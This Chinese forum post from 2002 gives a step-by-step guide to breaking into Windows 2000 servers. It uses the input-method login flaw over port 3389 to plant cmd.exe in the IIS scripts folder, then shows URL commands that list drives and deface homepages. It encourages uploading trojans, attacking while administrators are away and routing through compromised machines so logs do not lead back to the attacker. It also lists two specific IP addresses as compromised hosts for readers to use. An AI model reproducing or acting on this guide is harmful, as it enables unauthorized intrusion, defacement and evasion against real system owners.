- 帖子
- 56
- 积分
- 56
- 经验
- 56 点
- 威望
- 0 点
- 金钱
- 759 NG
- 魅力
- 571
- 性别
- 男
- 来自
- www.880770.com
- 注册时间
- 2001-10-23
我们约会吧!
|
1#
发表于 2002-1-9 17:48
| 只看该作者
【原创】记一次3389端口的攻击
以前我对网络安全有点兴趣,学了几天,曾经胡乱用端口扫描程序扫了些IP,尝试远程入侵了一些主机,但要声明,我可没有干过坏事。呵呵,问问丸子就知道我有多善良多可亲咯~~嘻嘻~~~
--------------------------------
windows2000的终端服务程序是以图形界面远程访问主机的3389端口,而微软的Windows2000的输入法漏洞打了补丁后还是存在很多这样那样的遗漏。
1、用端口扫瞄程序扫IP的3389端口,得到xx.xx.xx.xx。
2、运行windows2000终端客户程序,在服务器输入框里填入:xx.xx.xx.xx ,连接。
3、出现windows2000的登陆窗口,按下CTRL+SHIFT键,出现全拼输入法。
4、在输入法状态条上按mouse右键,选择帮助,选择输入指南,选择"选项"按右键。
5、选择"跳转到URL",输入:c:\winnt\system32\cmd.exe.
6、选择"保存到磁盘"。
7、选择目录:c:\inetpub\scripts\
8、打开IE,输入:xx.xx.xx.xx/scripts/cmd.exe?/c+dir+c:\ (看到什么了?)
嘿嘿,接下去可以做很多的事情了,比如修改主页啦,输入:xx.xx.xx.xx/scripts/cmd.exe?/c+echo+wolaile+>c:\inetpub\wwwroot\default.*
xx.xx.xx.xx/scripts/cmd.exe?/c+echo+wolaile+>c:\inetpub\wwwroot\index.*
当然如果你够狠,可以上传个木马之类的,运行后,通过控制端控制对方机器。
这是一个简单的例子,不过大家可不要乱来,要来也最好在深夜的时候,趁网管不在,偷偷溜上去玩会,也不要玩得太过份哦。最好找台肉鸡做跳板攻击,免得惹祸上身,因为攻击会留下日志的,如果你不会删除日志的话,最好别试~~~
我送大家两台肉鸡用用吧~见面礼咯~
210.41.188.4 210.41.188.32
---------------------------------------被抓了别说我-----------------------------------
嘻嘻~要不跟你没完~~~ |
|